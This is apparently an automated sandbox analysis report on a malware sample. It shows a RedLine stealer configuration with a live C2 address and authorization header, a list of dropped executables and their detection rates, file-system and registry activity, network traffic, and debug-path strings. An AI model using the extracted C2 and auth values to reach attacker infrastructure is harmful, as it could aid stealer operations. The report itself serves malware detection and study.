                      Source: 38.0.FBFF.tmp.fcxcx.exe.e50000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "fvcxcx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]ReversingLabs: Detection: 75%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[1].exeReversingLabs: Detection: 36%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\t5abhIx[1].exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[2].exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeReversingLabs: Detection: 36%
                      Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\AppData\Local\Temp\1014445001\182555961e.exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\AppData\Local\Temp\1014446001\799e7330b8.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Local\Temp\3417.tmp.vvv.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exeReversingLabs: Detection: 75%
                      Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeReversingLabs: Detection: 68%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\soft[1]Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\u1w30Wt[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\AzVRM7c[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\random[2].exeJoe Sandbox ML: detected
                      Source: file.exeJoe Sandbox ML: detected
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\graphJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49870 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49875 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49878 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49883 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.10:49889 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49895 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.10:49896 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49900 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49903 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49908 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49909 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.10:49917 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49916 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49920 version: TLS 1.2
                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412707099.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413257416.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: dwVrTdy.exe, 00000009.00000003.2123748966.000001B9CFD20000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000C.00000000.2123985997.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000C.00000002.2145233221.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000E.00000000.2144190009.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000F.00000000.2184398416.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 00000015.00000000.2210905809.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000001C.00000000.2376475392.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403438920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2494789208.00007FF821D65000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407734052.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402997907.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411298731.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412401802.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413433543.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2498270085.00007FF838AC1000.00000002.00000001.01000000.00000017.sdmp
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2404034326.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411720921.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2410685858.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412236687.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403127092.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vcruntime140.amd64.pdbGCTL source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2500759273.00007FF838AFE000.00000002.00000001.01000000.00000016.sdmp
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408261086.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402461321.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403281941.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412064565.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408717409.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbUGP source: F0A3.tmp.ctx.exe, 00000027.00000002.2494789208.00007FF821D65000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: vcruntime140.amd64.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2401331620.00000234A0E30000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2500759273.00007FF838AFE000.00000002.00000001.01000000.00000016.sdmp
                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413918050.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403748215.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411113036.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408039545.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402824142.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411883189.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: F0A3.tmp.ctx.exe, 00000027.00000002.2482728285.00007FF8209FD000.00000002.00000001.01000000.00000015.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407574010.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412918529.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408438351.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407874978.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2414099515.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2408870662.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2411536090.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2409067450.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2403603084.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413097007.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2407216629.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2406846700.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: dwVrTdy.exe, 00000009.00000003.2123748966.000001B9CFD20000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000000C.00000000.2123985997.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000C.00000002.2145233221.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000E.00000000.2144190009.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000000F.00000000.2184398416.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 00000015.00000000.2210905809.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp, graph.exe, 0000001C.00000000.2376475392.00007FF711D69000.00000002.00000001.01000000.0000000B.sdmp
                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2412551872.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: F0A3.tmp.ctx.exe, 0000001F.00000003.2413689058.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F28A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,9_2_00007FF643F28A90
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF684568A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,11_2_00007FF684568A90
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DD68A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,13_2_00007FF61DD68A90
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
